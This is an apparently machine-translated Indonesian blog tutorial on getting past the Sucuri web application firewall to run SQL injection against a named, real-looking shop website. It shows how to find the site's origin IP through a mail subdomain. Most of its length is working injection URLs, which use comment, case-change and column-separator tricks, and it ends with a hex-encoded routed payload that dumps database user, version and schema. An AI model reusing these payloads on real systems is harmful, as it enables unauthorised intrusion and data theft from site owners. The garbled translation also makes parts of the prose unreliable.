Oops! It appears that you have disabled your Javascript. In order for you to see this page as it is meant to appear, we ask that you please re-enable your Javascript!
Jum. Agu 23rd, 2019

Bypass Sucurity WebSite Firewall (WAF)

4 min read

Halo semua, dalam tutorial ini kita akan melewati terbaru WAF Sucurity. Yang menjadi sakit di pantat untuk banyak Inj3ct0rs. Berikut adalah pendekatan saya akan gunakan dalam tutorial ini. Aku tidak akan menjelaskan salah satu pendekatan ini secara mendalam karena mereka atau akan dijelaskan dalam Panduan untuk WAF Bypass oleh [email protected] Security.


Dalam Tutorial ini kita akan menggunakan metode Bypass berikut untuk Bypass WAF

Gunung Asal Server untuk Bypass Proxfied WAF

Mengomentari dan Inline komentar

Encoding URL


Campur Kasus ke Bypass Kasus Filter Sensitif

Kolom Separator WAF memotong

Routed SQLi ke Bypass WAF

Seperti Sucuri WAF adalah proxy antara Anda dan server Web, seperti yang ditunjukkan pada layar.


Jadi kita memiliki dua pendekatan yang berbeda untuk memotong itu. Pendekatan pertama kami ke Sucuri WAF memotong akan “Ninja Cara untuk memotong WAF” di mana kita akan menemukan sebuah backdoor siluman dan benar-benar menghindari menghadapi WAF dan menyerang target kami dari tempat sekitar yang ia tidak pernah memikirkan. Terutama serangan Surprize, korban tidak punya pilihan selain untuk meletakkan senjata.


Pendekatan kedua kami akan “Daya Pendekatan” harap Anda tahu apa yang saya maksud. Di sini kita akan Bypass WAF seperti Boss, dalam pendekatan ini kita akan memecah langsung melalui WAF dan menyerang Aplikasi di atasnya wajah. Hell Yeah !!!


Jadi mari kita mulai dengan yang pertama. Berikut seperti yang Anda lihat di atas penyerang di satu sisi WAF di antara dan kemudian server. Sekarang hanya berpikir Server adalah hidup dan harus memiliki hidup IP isnt itu. Apa yang kita dapatkan bahwa hidup IP dan mengirim Injection kami langsung ke IP atau Gunung Server untuk IP itu, yang akan memungkinkan permintaan kami untuk menghindari WAF dan mencapai langsung ke server. Ledakan!! kami IN. Tapi sekarang pertanyaannya adalah bagaimana untuk mendapatkan alamat IP, baik ada banyak cara yang saya akan membahas dalam panduan memotong WAF kami tapi tidak di sini. Sebagai yang tidak tutorial di mana kami akan menjelaskan semuanya dan membahas semua pendekatan. Di sini kita akan pergi Point to Point untuk memotong Firewall ini.

Kami akan menggunakan situs ini untuk memulai dengan “http://www.mbtagifts.com/shop.php?c=4” mari kita mulai. Kami akan menggunakan subdomain email untuk menemukan IP nyata dan menyuntikkan situs. Ping ke “mail.mbtagifts.com” Anda akan mendapatkan IP “50.28.71.142”. Sekarang mount IP dalam file Host atau proxy atau yang lain Anda dapat langsung menggunakan IP untuk menyuntikkan situs ini. Di sini saya akan menggunakan:

http://50.28.71.142/shop.php?c=4′
http://50.28.71.142/shop.php?c=4′ order by 31–+
http://50.28.71.142/shop.php?c=4′ and false UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30–+
http://50.28.71.142/shop.php?c=4′ and false UNION SELECT 1,2,3,4,5,concat%0a(0x4e616d65203a3a205a656e3c62723e55
736572203a3a20,user(),0x3c62723e4462203a3a20,Database(),0
x3c62723e56657273696f6e203a3a20,version(),0x3c62723e),7,8,9,1
0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30–+

Yakin reaksi Anda tentang hal ini akan menjadi:
Tapi tidak begitu bersemangat begitu awal. Itu adalah cara siluman Ninja. Sekarang mari kita asumsikan ia pergi begitu buruk bahwa kita tidak bisa mendapatkan Server IP Langsung, sekarang kita berada dalam situasi untuk menerobos WAR untuk menyuntikkan. Mari kita mendapatkan lebih dengan itu sudah. Membaca URL di bawah Sarana terdeteksi dan sarana lainnya dilewati.

http://www.mbtagifts.com/shop.php?c=4

http://www.mbtagifts.com/shop.php?c=4′– –

http://www.mbtagifts.com/shop.php?c=4′ order by 10– –

Order by Bypassed using Comments

http://www.mbtagifts.com/shop.php?c=4′ grouP by%23%0a20– –

Columns Found

http://www.mbtagifts.com/shop.php?c=4′ grouP by%23%0a30– –

http://www.mbtagifts.com/shop.php?c=4′ union select– –

http://www.mbtagifts.com/shop.php?c=4′ union distinctrow select%23

Sucuri Bypassed Now WAF 2nd

http://www.mbtagifts.com/shop.php?c=4’*2e9union select!1%23

Second WAF Bypassed using case change

http://www.mbtagifts.com/shop.php?c=4’*2e9unioN Select!1%23

Now have to add 30 Columns

http://www.mbtagifts.com/shop.php?c=4’*2e9unioN Select!1,2%23


No WAF Yet

http://www.mbtagifts.com/shop.php?c=4’*2e9unioN Select!1,2,3,4,5,6,7,8,9,10%23

http://www.mbtagifts.com/shop.php?c=4’*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15%23

http://www.mbtagifts.com/shop.php?c=4’*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23

WAF after 20 columns lets use Columns seperator Style WAF bypass

http://www.mbtagifts.com/shop.php?c=4’*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23

Bypassed

http://www.mbtagifts.com/shop.php?c=4’*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,~20,21,22,23,24,25%23

30 Columns Done

http://www.mbtagifts.com/shop.php?c=4’*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,~20,21,22,23,24,25,26,27,28,29,30%23

Sekarang kita harus mencetak output, mencetak seluruh output dan melewati hal-hal lain bisa menjadi sakit sehingga memungkinkan pertama kali mencoba “Routed SQL Injection”, Anda dapat membaca Routed SQLi jika Anda tidak tahu apa itu. Jadi ketika saya mulai pengujian seperti yang ditunjukkan di bawah ini:

No Error

http://www.mbtagifts.com/shop.php?c=4’*2e9unioN Select!1,0×27,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,

~20,21,22,23,24,25,26,27,28,29,30%23


No Error

http://www.mbtagifts.com/shop.php?c=4’*2e9unioN Select!1,2,0×27,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,

~20,21,22,23,24,25,26,27,28,29,30%23


And so i came to Sixth column and got an Extra error.

http://www.mbtagifts.com/shop.php?c=4’*2e9unioN Select!1,2,3,4,5,0×27,7,8,9,10,11,12,13,14,15,16,17,18,19,

~20,21,22,23,24,25,26,27,28,29,30%23


Confirming Routed Query

http://www.mbtagifts.com/shop.php?c=4’*2e9unioN Select!1,2,3,4,5,0x6c656c276f72646572206279203123,7

,8,9,10,11,12,13,14,15,16,17,18,19,~20,21,22,23,24,25,26,27,28,29,30%23


Sekarang sebagai yang dikonfirmasi saya menemukan ada 25 kolom: Berikutnya adalah menyuntikkan Routed Injection:

http://www.mbtagifts.com/shop.php?c=4’*2e9unioN Select!1,2,3,4,5,0x6c656c2720554e494f4e2053454c454

3542031333337312c31333337322c31333337332c313333373

42c31333337352c31333337362c31333337372c3133333738

2c31333337392c3133333731302c3133333731312c3133333

731322c3133333731332c3133333731342c3133333731352c3

133333731362c3133333731372c3133333731382c313333373

1392c3133333732302c3133333732312c3133333732322c3133

333732332c3133333732342c31333337323523,7,8,9,10,11,12,

13,14,15,16,17,18,19,~20,21,22,23,24,25,26,27,28,29,30%23

Cek di sumber Anda akan melihat ini 13.374 dicetak di sumber, Sekarang suntik DIOS di kolom keempat dan penggalian Output:

http://www.mbtagifts.com/shop.php?c=4’*2e9unioN Select!1,2,3,4,5,0x6c656c2720554e494f4e2053454c454

35420312c322c332c636f6e6361742830783237336533

6332663631336533633266373436343365336332663734

373233653363326637343631363236633635336534653631

366436353230336133613230356136353665336336323732

3365353537333635373232303361336132302c7573657228

292c3078336336323732336534343632323033613361

32302c446174616261736528292c3078336336323732336

5353636353732373336393666366532303361336132302c76

657273696f6e28292c307833633632373233652c6d616

b655f73657428362c403a3d307830612c2873656c656374283

12966726f6d28696e666f726d6174696f6e5f736368656d612e

636f6c756d6e73297768657265287461626c655f736368656d61

213d3078363936653636366637323664363137343639366

63665356637333633363836353664363129616e64403a3d6

d616b655f736574283531312c402c307833633663363933

652c7461626c655f6e616d652c636f6c756d6e5f6e616d6529

292c4029292c352c362c372c382c392c31302c31312c313

22c31332c31342c31352c31362c31372c31382c31392c32302c3

2312c32322c32332c32342c323523,7,8,9,10,11,12,13,14,15,16,1

7,18,19,~20,21,22,23,24,25,26,27,28,29,30%23


Sucurity dock Bypass suplemen: D

Facebook Comments

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *

Copyright © All rights reserved. | News by AF MD5.